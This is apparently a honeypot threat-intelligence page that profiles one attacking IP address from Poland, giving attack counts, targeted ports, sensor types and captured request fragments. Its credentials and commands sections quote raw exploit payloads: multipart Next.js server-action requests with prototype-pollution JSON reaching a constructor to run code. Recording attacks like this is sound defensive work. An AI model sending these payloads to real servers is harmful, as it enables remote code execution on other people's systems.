Active Threat • CRITICAL
195.3.222.78
🎯
11,705
Total Attacks
🔌
100
Ports
📡
13
Attack Types
🦠
1
Malware
Geolocation
- Country
- 🇵🇱 Poland
- City
- Unknown
- ASN
- AS201814
- ISP
- MEVSPACE sp. z o.o.
Attack Types
adbhoney
cowrie
dicompot
ciscoasa
dionaea
honeytrap
honeyaml
conpot
Attacked Ports
327683276932770327714100205332774327734916082004915449155327728201327753277732778491654916732784+80
Associated Malware
Attempted Credentials
🔐Next-Action: x/X-Nextjs-Request-Id: poop1234
4x🔐Content-Disposition: form-data; name="1"/(empty)
4x🔐Content-Disposition: form-data; name="0"/(empty)
4x🔐Content-Length: 517/Connection: close
2x🔐Content-Length: 518/Connection: close
2x🔐{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 155170+true+3677428;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}/------WebKitFormBoundaryx570626502761
1x🔐"$@0"/------WebKitFormBoundaryx898859589121
1x🔐{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 325120+true+2764701;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}/------WebKitFormBoundaryx898859589121
1x🔐POST /_next/server HTTP/1.1/Host: 51.222.138.43:23
1x🔐POST /_next HTTP/1.1/Host: 51.222.138.43:23
1x🔐User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136./Accept-Encoding: gzip, deflate
1x🔐"$@0"/------WebKitFormBoundaryx505069716647
1x🔐POST /api HTTP/1.1/Host: 51.222.138.43:23
1x🔐{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 79057+true+6388678;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}/------WebKitFormBoundaryx505069716647
1x🔐POST /api/route HTTP/1.1/Host: 51.222.138.43:23
1xExecuted Commands
$
------WebKitFormBoundaryx80080899346x$
Accept-Encoding: gzip, deflate2x$
Next-Action: x2x$
Content-Disposition: form-data2x$
X-Nextjs-Request-Id: poop12342x$
X-Nextjs-Html-Request-Id: ilovepoop_80080899342x$
KHTML, like Gecko2x$
Content-Disposition: form-data; name="0"1x$
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx80080899341x$
X111xRisk Assessment
87
/100
LowMediumHighCritical